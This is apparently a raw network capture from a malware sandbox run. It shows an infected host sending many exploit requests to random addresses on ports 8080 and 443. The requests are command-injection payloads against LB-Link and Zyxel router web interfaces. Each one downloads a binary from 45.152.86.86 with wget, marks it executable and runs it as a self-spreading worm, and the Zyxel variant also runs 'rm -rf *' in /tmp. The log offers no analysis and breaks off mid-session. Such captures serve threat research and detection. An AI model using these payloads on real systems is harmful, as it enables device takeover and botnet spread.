49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 2f 73 71 75 69 64 2d 69 6e 74 65 72 6e 61 6c 2d 73 74 61 74 69 63 2f 69 63 6f 6e 73 2f 53 4e 2e 70 6e 67 27 29 20
                                        Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2016 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('/squid-internal-static/icons/SN.png')


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9695192.168.2.234454482.193.238.1738080
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.428806067 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:22:59.627031088 CEST516INHTTP/1.1 400 Bad Request
                                        Content-Type: text/html
                                        Content-Length: 349
                                        Connection: close
                                        Date: Sun, 31 Mar 2024 07:22:59 GMT
                                        Server: lighttpd/1.4.31
                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>
                                        Mar 31, 2024 09:23:00.226520061 CEST516INHTTP/1.1 400 Bad Request
                                        Content-Type: text/html
                                        Content-Length: 349
                                        Connection: close
                                        Date: Sun, 31 Mar 2024 07:22:59 GMT
                                        Server: lighttpd/1.4.31
                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9696192.168.2.235516838.181.249.2088080
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.691417933 CEST179OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9697192.168.2.235339467.208.161.183443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.997414112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9698192.168.2.2348166223.248.58.205443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.997458935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9699192.168.2.2337752101.43.220.215443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.997519970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9700192.168.2.233390070.113.131.234443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.997582912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9701192.168.2.235400054.220.129.158443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.997612000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9702192.168.2.2350764152.124.96.203443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.997658968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9703192.168.2.235054285.83.168.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.997715950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9704192.168.2.233373268.234.207.25443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.997757912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9705192.168.2.235311214.40.60.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.997792006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9706192.168.2.2340254121.239.201.42443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.997848988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9707192.168.2.235011439.82.178.48443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.997885942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9708192.168.2.23563665.103.49.5443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.997951984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9709192.168.2.235344857.225.88.237443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.998009920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9710192.168.2.233379069.205.108.98443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.998064995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9711192.168.2.2354950140.242.228.7443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.998111010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9712192.168.2.2358900150.38.28.162443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.998161077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9713192.168.2.233473480.124.47.135443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.998195887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9714192.168.2.2354854137.118.250.177443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.998240948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9715192.168.2.2360634208.228.76.238443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.998313904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9716192.168.2.2337800141.15.223.5443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.998359919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9717192.168.2.2335688206.193.169.71443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.998402119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9718192.168.2.2338276184.38.41.89443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.998451948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9719192.168.2.2354898123.155.206.90443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.998497009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9720192.168.2.235365884.189.110.49443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.998559952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9721192.168.2.233639434.125.89.72443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.998600006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9722192.168.2.2339234201.116.159.70443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.998625040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9723192.168.2.2356576202.50.254.178443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.998689890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9724192.168.2.234880645.83.103.114443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.998732090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9725192.168.2.235984062.36.67.239443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.998785019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9726192.168.2.234896853.47.255.175443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.998847961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9727192.168.2.235831270.100.129.191443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.998894930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9728192.168.2.2354308102.28.110.236443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.998933077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9729192.168.2.2338882148.171.174.105443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.998989105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9730192.168.2.2351706157.39.249.18443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.999022007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9731192.168.2.2348604120.116.64.121443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.999067068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9732192.168.2.2338534108.171.165.45443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.999135017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9733192.168.2.235389620.171.191.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.999164104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9734192.168.2.235797047.252.66.114443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.999223948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9735192.168.2.2351972223.213.222.246443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.999257088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9736192.168.2.2336158210.206.69.57443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.999308109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9737192.168.2.235473027.112.107.201443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.999360085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9738192.168.2.235726068.14.200.253443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.999429941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9739192.168.2.2360516144.168.111.172443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.999460936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9740192.168.2.2340530134.76.208.200443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.999491930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9741192.168.2.235023849.218.144.225443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:59.999530077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        9742192.168.2.23435561.18.245.58443
                                        TimestampBytes transferredDirectionData
